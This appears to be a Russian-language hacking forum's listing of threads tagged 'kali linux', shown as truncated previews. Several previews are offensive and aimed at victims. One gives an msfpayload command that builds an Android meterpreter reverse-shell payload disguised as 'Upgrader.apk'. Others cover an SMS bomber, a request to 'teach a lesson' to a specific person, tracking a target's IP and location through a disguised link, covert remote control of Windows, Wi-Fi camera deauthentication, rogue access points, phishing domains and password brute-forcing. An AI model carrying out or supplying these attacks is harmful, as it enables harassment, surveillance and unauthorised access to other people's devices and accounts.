kali linux

  • Добро пожаловать на наш форум Гость !
    Чтобы пользоваться всеми его возможностями необходимо Зарегистрироваться
    Без регистрации Вы сможете просматривать только определенные темы
    Зарегистрироваться здесь, чтобы воспользоваться всеми функциями форума.
  1. MoToTroz

    Оффтоп Я новичок (памагити)

    Всем привет, я новичок в сфере хакинга я никогда ничего не взламывал, и хотел бы спросить, где искать конкретную информацию про взломы, или откуда научиться а ещё я только установил kali linux и не понимаю что делать. И хотел бы узнать как стать анонимным. Про VPN скажите) ссылку что-ли
  2. M9y4u

    [ХАЛЯВА] Пара книг на русском, без хайда

    Выкладываю пару книг, не новых, не приватных, но без хайда Тестирование на проникновение с помощью Kali Linux 2.0(на русском) в pdf - тык Книженция по иб - тык Прога для просмотра книги - тык (можно ставить на основу VT) P.s Ненавижу тех, кто ставит хайд на литературу( еще и не первой свежести...
  3. Bushidō

    Статья Kali Linux NetHunter на Android: зачем и как установить

    Наверняка тебя посещали мысли о том, как хакать все вокруг, не привлекая лишнего внимания санитаров службы безопасности и окружающих, быть похожим на героев фильмов, взламывающих системы просто с мобильного устройства, или как прокачать свою мобильность с минимальной потерей функционала? У меня...
  4. Bushidō

    Статья Как удаленно взломать Android при помощи Kali Linux

    В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Шаг 1. Запустите Кали Откройте терминал, и создайте файл Trojan.apk Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным...
  5. R

    Оффтоп Как напортачить человеку дистанционно?

    Всем привет Нужно напортачить(проучить) человеку. Имеется на борту Kali Linux и Win10. Нужны способы по типу смс бомберов или взлома страницы в Инстаграмм. В общем, тому подобные способы нужны Есть предложения? И если да, то как реализовать. Заранее спасибо
  6. STARTS_Pr0

    b0mb3r by crinny

    Установка На Linux Откройте терминал и установите Python и git с помощью вашего пакетного менеджера: Arch/manjaro/antergos: pacman -S git python --needed Ubuntu/Debian/Deepin/any_apt_based: apt install git python Fedora: yum install git python Склонируйте репозиторий при помощи git и перейдите...
  7. ziler

    [ХАЛЯВА] Книга "Тестирование на проникновение с помощью Kali Linux 2.0"

    Считаю, классная книга. Книга состоит из 8 частей, в которые входят 62 главы. Все подробно рассказывается с использованием примеров. В книге используется самая актуальная информация на сегодняшний день. Скачать ТЫЦ | ВТ
  8. STARTS_Pr0

    Авторская статья Поиск пользователя по соц. сетям

    Всем привет! Решил написать для вас маленькую статейку как можно найти пользователя в соц. сетях по его нику. Все очень просто на самом деле. Сначала клонируем к себе скрипт и запускаем его следующей командой: git clone https://github.com/thelinuxchoice/userrecon cd userrecon bash userrecon.sh...
  9. STARTS_Pr0

    Статья Запуск Kali Linux на компьютерах через USB

    С помощью USB-флешки с Kali вы можете запускать эту хакерскую ОС на любой машине, к которой сможете подключиться. Это значит, что вам не нужно выделять ваш личный компьютер или его часть для ваших хакерских приключений, или покупать другой ПК только лишь для того, чтобы использовать Kali. Live...
  10. STARTS_Pr0

    Статья Вычисление координат и ip жертвы по ссылке

    I-See-You создал Viral Maniar из Австралии для вычисления цели по подкинутой ссылке. Ссылку генерирует сам инструмент используя ресурс serveo net. Перед предложением цели пройти по ссылке,желательно её сократить и завуалировать. Установка: # git clone...
  11. mk7even

    Скрытое управление компьютером на Windows (используя Metasploit)

    1. Введение В этой заметке будет рассмотрен вопрос скрытого управление компьютером на Windows. Указанная задача может быть решена различными способами. В том числе с применением легитимных программ – к примеру, VNC серверами, TeamViewer (если добавить в автозапуск и скрыть отображение иконки в...
  12. Bushidō

    Статья Отключаем камеры в любой Wi-Fi сети

    Отключаем камеры в любой Wi-Fi сети Отключаем камеры в любой Wi-Fi сети Что вам понадобится Для начала вам понадобится Kali Linux или другой Linux дистрибутив, такой как Parrot Security или BlackArch, который может запускать Aireplay-ng. Вы можете запустить их с виртуальной машины, с помощью...
  13. Bushidō

    Статья Лучшие инструменты Kali LInux

    ЛУЧШИЕ ИНСТРУМЕНТЫ KALI LINUX Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони и Макс Мозер. Предназначен прежде всего для проведения тестов на безопасность. Наследник развивавшегося до 2013 года на базе Knoppix...
  14. Bushidō

    Статья Maltego. Инструмент разведки Kali Linux

    Maltego. Инструмент разведки Kali Linux Что такое Maltego? Maltego позволяет собрать воедино информацию полученную из открытых и закрытых источников, она позволяет визуализировать агрегированные данные. Maltego предлагает пользователю беспрецедентную информацию. Информация — это средство...
  15. Bushidō

    Статья Лучшие дистрибутивы Linux для взлома

    Лучшие дистрибутивы Linux для взлома Если вы хотите начать карьеру в сфере информационной безопасности или вы уже работаете как профессионал в этой сфере, или вы просто заинтересованы в этой конкретной области знаний, мы найдем достойный Linux дистрибутив, который подходит для вашей цели. Есть...
  16. mk7even

    Статья WiFi-Pumpkin

    WiFi-Pumpkin – мошенническая точка доступа с графическим интерфейсом и богатым функционалом Целью атак с мошеннической точкой доступа (Rogue Wi-Fi Access Point Attack) является не пароль от Wi-Fi сети, а данные, передаваемые через эту точку доступа. В отношении этих данных выполняется атака...
  17. Bushidō

    НЕАКТУАЛЬНО База словарей с паролями под Брут

    Переходим по Ссылке, выбираем нужный словарь.
  18. mk7even

    Статья CATPHISH

    Программа CATPHISH генерирует выглядящие похоже доменные имена и пытается проверить их доступность. Полученная информация может использоваться для фишинга, корпоративного шпионажа, а также для их выявления. Работа программа схожа с URLCrazy. В настоящее время поддерживаются следующие алгоритмы...
  19. mk7even

    Статья Как взламывать онлайн-пароли веб-форм при помощи THC-Hydra и Burp Suite

    Давайте начнем. Запустите Kali и откройте THC-Hydra. Ее можно найти в Applications -> Kali Linux -> Password Attacks -> Online Attacks -> hydra. Шаг 2. Получение параметров веб-формы Чтобы иметь возможность взломать имена пользователей и пароли в веб-формах, нам необходимо определить параметры...
  20. STARTS_Pr0

    Статья Как запустить любую уязвимость в termux

    Начнём с азов. Что же такое termux? Все просто это та же командная строка что и в kali linux только на андроид. Если у вас нету на пк кали , то достаточно просто скачать termux. Скачать можно на play market. И так скачали ? Приступим. Ничего сложного нету пишем первую команду , которая...